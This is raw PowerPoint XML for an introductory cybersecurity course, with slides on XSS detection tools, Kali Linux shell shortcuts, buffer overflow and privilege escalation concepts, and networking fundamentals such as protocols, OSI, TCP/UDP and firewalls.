              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – The vulnerability exists in client-side scripts, not server responses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1549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07A4-2C37-1AEC-63C9-B9E7AF19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7.5   XSS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52763-97B9-F4CE-0385-98452DF2C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74" y="1885950"/>
            <a:ext cx="8060055" cy="1846659"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Tools for Detecting XSS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Intercept and modify requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>XSS Hunter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Track and analyze XSS payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>OWASP ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Automated web scanner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44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B280-6439-A445-9D90-361A7105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EF185-3C60-F17B-4FCA-292969DB5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CC4C3AF-E18F-8416-F12F-C36DFB1BA2EB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D8693CB-DBA4-4E21-2DDB-5DBED8512F2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5DBC841-D5E4-C6CC-019D-19E97CB3321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16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5D5C2A0-7209-388B-BB6A-D23B6DA2BE0C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B924A1D6-C008-BE71-D556-BB5BD284F7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9BAF70F9-B96A-2551-6BAE-567332A9003E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="1026239"/>
            <a:ext cx="9173210" cy="3347085"/>
            <a:chOff x="-13716" y="1034796"/>
            <a:chExt cx="9173210" cy="334708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89016C78-30ED-B978-0718-3957949FCA4C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789A6862-E8B6-FB49-E67C-DFEA56605E24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B793B274-4D9A-76DA-F102-7DD552FDF8B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33760375-FB73-CBC1-0D2C-B4D83EBBE485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1F89C31C-30C8-025A-48E7-9A8C58AB6747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D1C38089-6E1D-56D1-2EA1-1ECE71882737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16</a:t>
            </a:fld>
            <a:endParaRPr spc="-20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22D17712-A812-D221-63E4-89F294CA1DBC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7422590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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-JO" altLang="en-US" spc="-10" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" spc="-10" dirty="0"/>
              <a:t>Important abbreviations in Kali Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" spc="-10" dirty="0"/>
              <a:t>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A4B607C1-816F-3927-0E9D-D2A428B5FF12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467583" y="1915698"/>
            <a:ext cx="29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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-JO" dirty="0"/>
              <a:t>!!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  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6A32E7-93F1-5FAF-C68D-C8116569C60C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1510193" y="2131689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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE55B132-9D76-1AB9-EDFB-142C4CF2BF48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3102278" y="1884959"/>
            <a:ext cx="369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Shows all executed commands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1B4F4BD6-7135-168C-1E04-CF6DE3B81D08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599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! + number      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B8B6E1-7ADD-9A93-2D1A-D29B9D6F0CBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2094190" y="2511361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52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16773A61-3A0B-D847-5ADD-FE4CB3FCB67D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4139996" y="2313214"/>
            <a:ext cx="420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Execution of a previous executive order</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7840985-EA0B-23B3-3DD2-340BADA1E74B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="2724150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  Tab    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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95B2B3-152F-4715-7957-4F0561E82CBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1735252" y="2913261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 Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AACEBA7-25C7-277F-40D5-8CD1DCDE5091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3220967" y="2749550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 complete a specific action</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365853408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0657-F775-D2F4-5038-D05DD7CA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ar-JO" dirty="0"/>
              <a:t>7.6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   Buffer Over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74D74-75D1-F1E8-F57E-49CFAC511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Buffer Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> where a program writes more data to a buffer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>temporary memory storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) than it can hold. This can lead to the execution of arbitrary code or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>crashing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers exploit buffer overflows to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Overwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and execute shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>unauthorized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> access to systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Escalate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on a target machine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9377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A1FF-03A6-1A90-B8C3-D243E149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7.6 Buffer Over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F9CA0-F945-B919-E7B9-B13E0EC4E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276" y="1733550"/>
            <a:ext cx="8060055" cy="1846659"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Common Signs and Scenarios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Application crashes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or behaves unexpectedly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Classic example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: inputting a very long string into a login or form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8089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74F8-BCD4-87FF-8F7B-FC3E4DF6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7.7 Privilege Escalation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D6450-FF21-040F-4B5E-838CD015C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276" y="2038350"/>
            <a:ext cx="8060055" cy="1846659"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>gaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>higher-level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>permissions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> rights on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> after an initial compromise. It is a key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>post-exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> step for Red Team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>operators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8727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6356-E5EF-C0EF-2729-E1E22291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446276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>7.7 Privilege Escalation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57083-A863-23BE-F594-9F130F456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66" y="1504950"/>
            <a:ext cx="8060055" cy="2585323"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Types of Privilege Escalation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Vertical Escalation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Gaining higher privileges (e.g.,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b="1" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>root/admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Horizontal Escalation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Accessing resources or accounts at the same privilege level (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>accessing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>user's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>files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4B0D-1D65-BC99-7DF4-478BD2EE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DA467-B34A-99EF-33F6-222029490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D627F7C8-D9EF-B964-9E2B-F087DB67B31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5" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDB9F57B-9B57-662B-AC39-29A14D6DAA96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-13843" y="1034669"/>
            <a:ext cx="9173210" cy="3347085"/>
            <a:chOff x="-13843" y="1034669"/>
            <a:chExt cx="9173210" cy="334708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243D4BA1-776E-F8D8-830C-D43FD84E08E7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476FE4C2-78D4-288F-BE86-6E40D1F92CDA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52146C3D-2810-A7F3-8A86-BD24A61AB51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9" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39B345BA-97CD-9A37-80A3-C24B3A9CE6A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411276" y="114045"/>
            <a:ext cx="7936052" cy="685957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 altLang="en-US" spc="-10" dirty="0"/>
              <a:t>Introduction to Cybersecurity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" spc="-10"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A7FBDA7-A648-3406-7385-08D2A1F35F72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688340" y="1165352"/>
            <a:ext cx="3288029" cy="2380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pc="-10" dirty="0"/>
              <a:t>2-Networking Fundamentals </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="65"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" spc="-10" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="688340" lvl="1" indent="-351790">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="688340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" spc="-10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="688340" lvl="1" indent="-351790">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="688340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="688340" lvl="1" indent="-351790">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="688340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Protocol Layers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="688340" lvl="1" indent="-351790">
              <a:lnSpc>
                <a:spcPts val="1835"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="688340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>ISO/OSI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37A45044-1A84-CE79-8026-2C4F02458099}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610362" y="1735073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5F861F23-B00B-AD12-F4E0-CAEAC9860D68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4803775" y="1904746"/>
            <a:ext cx="2507615" cy="766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lvl="1" indent="-35179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364490" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Encapsulation</a:t>
            </a:r>
            <a:endParaRPr sz="1700" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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Roboto"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:endParaRPr sz="1700" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="364490" lvl="1" indent="-351790">
              <a:lnSpc>
                <a:spcPts val="1835"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
              <a:tabLst>
                <a:tab pos="364490" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Internet Protocol (IP)</a:t>
            </a:r>
            <a:endParaRPr sz="1700" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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64607D5-DD0C-2DF3-F2EC-0A5B7C647AC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D3CD06D8-2790-0993-BD96-65E1380D7C6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17</a:t>
            </a:fld>
            <a:endParaRPr spc="-20" dirty="0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EF44B919-E9E9-5BF8-5439-5DF3CCBA55C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4803774" y="3148711"/>
            <a:ext cx="182562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00" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>7. TCP and UDP</a:t>
            </a:r>
            <a:endParaRPr sz="1700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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08F01F8-E893-7DA9-79D6-0261BF77EE81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4803774" y="3667150"/>
            <a:ext cx="3258057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00" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>8. Firewalls and Network Defense</a:t>
            </a:r>
            <a:endParaRPr sz="1700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/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4582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BE040B6-6E0B-9E03-52D0-FC83A162DF7C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075B60A-D8E6-12A3-F87D-68EEBABD0EE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AAD6FE2-5DD3-D582-43CA-86543BE266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18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D787C8B1-8972-D511-6A93-86561BAB3836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks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5400" spc="-10"/>
              <a:t>Protocols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74632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5BC1-CF6F-BFD8-10D3-BD4F5F0E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02D56-804E-EB4F-7D49-0A6F8AEF4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9ADD6361-E8FC-C24A-60A0-D4EEAF3F625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5" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B3C9397-73C9-7695-6058-C57A9448B099}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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CD04824-C689-6004-F469-72D1F78A725A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14FD46BF-AE2A-97DA-CAEA-585F440893FA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BF9C6AA6-85ED-0C88-E7C2-70B007F2CA78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411276" y="114045"/>
            <a:ext cx="7936052" cy="818515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spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>2.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-15"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-10"/>
              <a:t>Protocols</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" spc="-10"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D8383447-B111-4CB7-C62E-07FC62DDAAE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19717C9D-ECFF-AF7E-59D9-FA53777FF91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19</a:t>
            </a:fld>
            <a:endParaRPr spc="-20"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DD222000-0FE0-E2A9-277B-DF12FA0EE6D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688340" y="1453134"/>
            <a:ext cx="7557134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7F7F7"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>How</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F7F7F7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7F7F7"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>does this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F7F7F7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7F7F7"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>support</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F7F7F7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7F7F7"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>my</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F7F7F7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7F7F7"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F7F7F7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F7F7F7"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>career?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Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="721360" marR="612775" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="721360" algn="l"/>
              </a:tabLst>
            </a:pP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Protocols</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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used</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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every</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-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computer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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network communication</a:t>
            </a:r>
            <a:endParaRPr lang="ar-JO" sz="2400" spc="-10" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="721360" marR="612775" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="721360" algn="l"/>
              </a:tabLst>
            </a:pP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You</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400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need</a:t>
            </a:r>
            <a:r>
